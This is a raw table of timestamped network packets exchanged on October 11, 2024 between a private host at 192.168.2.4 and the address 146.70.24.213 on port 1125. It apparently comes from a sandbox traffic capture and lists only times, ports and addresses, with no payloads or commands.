Oct 11, 2024 16:53:49.061266899 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.061274052 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.061283112 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.061297894 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.061297894 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.061311960 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.061325073 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.061338902 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.061341047 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.061341047 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.061355114 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.061367989 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.061381102 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.061417103 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.061417103 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.061429024 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.061448097 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.061461926 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.061475039 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.061486959 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.061500072 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.061505079 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.061505079 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.061516047 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.061525106 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.061530113 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.061544895 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.061557055 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.061592102 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.061592102 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.101964951 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.148195028 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.148226023 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.148246050 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.148257971 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.148271084 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.148282051 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.148294926 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.148307085 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.148319006 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.148329973 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.148341894 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.148353100 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.148364067 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.148370981 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.148410082 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.148418903 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.148427963 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.148442984 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.148453951 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.148466110 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.148478031 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.148490906 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.148513079 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.148513079 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.148513079 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.148567915 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.148581028 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.148593903 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.148607016 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.148619890 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.148632050 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.148646116 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.148804903 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.149394989 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.149409056 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.149420977 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.149466038 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.149498940 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.149512053 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.149524927 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.149537086 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.149549007 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.149573088 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.149573088 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.149640083 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.149652958 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.149666071 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.149678946 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.149692059 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.149692059 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.149708033 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.149719954 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.149732113 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.149736881 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.149744034 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.149765015 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.149775982 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.149784088 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.149784088 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.149789095 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.149801970 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.149840117 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.149844885 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.149852037 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.149864912 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.149919987 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.149919987 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.149976969 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.150043011 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.150082111 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.150126934 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.150142908 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.150157928 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.150172949 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.150187969 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.150192022 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.150192976 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.150204897 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.150222063 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.150235891 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.150249958 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.150262117 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.150262117 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.150264978 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.150293112 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.150306940 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.150307894 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.150324106 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.150338888 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.150352955 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.150367975 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.150377035 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.150377035 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.150382996 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.150399923 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.150448084 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.150449991 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.150449991 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.150480032 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.150495052 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.150509119 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.150522947 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.150528908 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.150528908 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.150537014 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.150552034 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.150567055 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.150569916 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.150583029 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.150597095 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.150610924 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.150624037 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.150639057 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.150644064 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.150644064 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.150660992 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.150680065 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.150680065 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.150731087 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.150747061 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.150762081 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.150777102 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.150810957 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.150827885 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.151865005 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.152000904 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.152107000 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.152487993 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.152568102 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.152585983 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.152595043 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.152679920 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.152684927 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.152700901 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.152717113 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.152731895 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.152754068 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.152785063 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.152795076 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.152811050 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.152826071 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.152863979 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.152879953 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.152903080 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.152910948 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.152910948 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.152920008 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.152935028 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.152950048 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.152964115 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.152966976 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.152978897 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.152983904 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.152996063 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.153029919 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.153079987 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.239073038 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.239198923 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.239252090 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.239278078 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.239288092 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.239341021 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.239402056 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.239409924 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.239445925 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.239479065 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.239511967 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.239521980 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.239521980 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.239546061 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.239578009 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.239607096 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.239638090 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.239653111 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.239653111 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.239670992 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.239698887 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.239731073 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.239763021 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.239795923 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.239805937 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.239805937 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.239829063 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.239881039 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.239934921 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.239934921 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.239980936 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.240031958 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.240063906 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.240094900 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.240128040 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.240138054 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.240138054 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.240160942 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.240195036 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.240227938 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.240272045 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.240272045 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.240278959 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.240298033 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.240313053 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.240334988 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.240369081 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.240381002 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.240381002 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.240418911 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.240453005 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.240485907 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.240521908 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.240528107 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.240528107 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.240555048 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.240602970 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.240617037 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.240641117 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.240664005 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.240664005 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.240674973 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.240709066 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.240741014 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.240788937 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.240827084 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.240849972 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.240865946 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.240880013 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.240880966 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.240942955 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.240976095 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.241065979 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.241080046 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.241086006 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.241103888 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.241120100 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.241194010 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.241194010 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.241203070 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.241254091 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.241295099 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.241295099 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.241306067 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.241338015 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.241374969 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.241405964 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.241455078 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.241483927 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.241483927 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.241487026 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.241540909 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.241573095 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.241609097 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.241615057 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.241620064 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.241645098 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.241669893 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.241702080 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.241735935 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.241767883 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.241770029 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.241770983 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.241801977 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.241835117 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.241867065 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.241898060 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.241911888 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.241911888 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.241930962 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.241961956 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.241995096 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.242024899 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.242038012 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.242038012 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.242124081 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.242150068 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.242158890 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.242192984 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.242222071 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.242238045 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.242254019 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.242289066 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.242320061 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.242331982 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.242331982 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.242357016 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.242389917 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.242423058 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.242450953 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.242455006 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.242470980 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.242490053 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.242522001 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.242553949 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.242585897 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:49.242602110 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.242602110 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:49.242619991 CEST	1125	49730	146.70.24.213	192.168.2.4
